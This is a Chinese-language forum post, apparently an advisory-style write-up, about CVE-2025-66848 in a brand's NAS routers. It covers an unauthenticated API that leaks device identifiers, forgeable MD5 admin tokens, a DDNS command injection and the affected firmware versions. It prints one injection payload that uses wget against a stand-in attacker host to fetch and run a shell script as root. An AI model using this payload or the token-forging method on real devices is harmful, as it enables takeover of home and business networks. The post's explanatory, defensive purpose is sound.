某东云旗下多款主流NAS路由器被曝出存在一个严重的安全漏洞,该漏洞可能导致数以千计的家庭及企业网络完全暴露在攻击风险之下。此漏洞影响该品牌多款路由器型号,远程攻击者能够借此彻底绕过身份验证机制,并以最高权限(root)执行任意命令。
该漏洞编号为CVE-2025-66848,其CVSS评分高达9.8分。这一评分等级通常用于界定危害性最大、最易被利用的临界高危漏洞。
未鉴权API接口直接暴露
整个攻击链的起点,是一个未做任何安全防护的API接口:/api/joylink。该接口不仅缺乏身份鉴权,还会直接返回包含路由器MAC地址及名为feedid的唯一标识符在内的敏感设备信息。
攻击者获取这些泄露的信息后,只需借助已知的MD5哈希算法执行一个相对简单的运算,就能生成有效的管理员身份令牌(Token)。在安全设计领域,“设备唯一标识”与“可预测算法”的组合,几乎等同于“明文口令”。
对于一个设计基本合理的设备管理接口,其结构至少应遵循以下层次:
┌──────────────────────────┐
│ 云端管理平台(JD Cloud) │
└──────────▲───────────────┘
│ 已鉴权
┌──────────┴───────────────┐
│ 设备管理 API(内部) │ ← 需要 token / mTLS
│ - 设备注册 │
│ - 设备状态 │
│ - 控制指令 │
└──────────▲───────────────┘
│
┌──────────┴───────────────┐
│ 本地设备接口(LAN only) │ ← 仅内网访问
│ - 状态查询 │
│ - 本地配置 │
└──────────────────────────┘
然而,在此次漏洞中,本应局限于设备内部或受严格保护的API,被直接暴露在公网并可被任意调用,这无疑是将设备内部识别接口错误地当成了公网信息查询接口。
公网
↓
/api/joylink ← 直接暴露
↓
返回:MAC + feedid
在缺乏身份校验、来源IP限制、网络隔离以及访问频率控制等基本安全措施的情况下,此类设计缺陷为攻击者敞开了大门。这提醒我们,在设计与实现网络设备接口时,必须严格遵循最小权限和纵深防御原则,相关的安全设计讨论可以在网络/系统板块找到更多案例。
完整的攻击路径剖析
在该漏洞中,管理员令牌的生成算法是可预测且完全可复现的。算法仅使用了feedid和固定规则进行MD5计算,其中未引入任何随机因子、时间戳或服务端私钥。这意味着,一旦攻击者通过未授权API获取到feedid,即可离线计算出有效的管理员Token。
获得管理员Token后,攻击者便可调用管理后台API,直接重置系统密码,无需任何二次认证即可获取Web管理后台的完全控制权。至此,攻击者已拥有设备配置修改、动态域名解析(DDNS)设置等高级权限。
攻击的最终阶段利用了设备DDNS服务中存在的一个命令注入漏洞。例如,设备可能以如下方式调用DDNS客户端:
ddns-client --name=<用户输入>
攻击者可以在配置DDNS名称时注入恶意命令:
test; wget attacker.com/shell.sh | sh
此注入将导致设备以root权限从攻击者控制的服务器下载并执行恶意脚本,从而实现远程代码执行(RCE)。一旦成功,攻击者不仅能以root身份登录设备,还可以修改系统关键文件、安装持久化后门、监听所有网络流量,并以此为跳板对内网其他设备发起渗透测试。整个攻击链条从信息泄露开始,最终实现了权限的全面突破。
漏洞影响范围
此次漏洞影响范围覆盖多款搭载旧版固件的某东云NAS路由器,具体受影响的型号及固件版本如下:
- AX1800(固件版本 v4.3.1.r4308 及更早版本)
- AX1800 Pro(固件版本 v4.5.1.r4533 及更早版本)
- AX3000(固件版本 v4.3.1.r4318 及更早版本)
- AX6600(固件版本 v4.5.1.r4533 及更早版本)
- BE6500(固件版本 v4.4.1.r4308 及更早版本)
- ER1 / ER2(固件版本 v4.5.1.r4518 及更早版本)
建议使用上述设备的用户立即检查固件版本,并尽快升级至官方发布的最新安全版本。对于物联网设备安全保持关注和讨论,可以前往云栈社区的技术板块与其他开发者交流。
发表于 昨天 00:47
|
查看: 6|
回复: 0
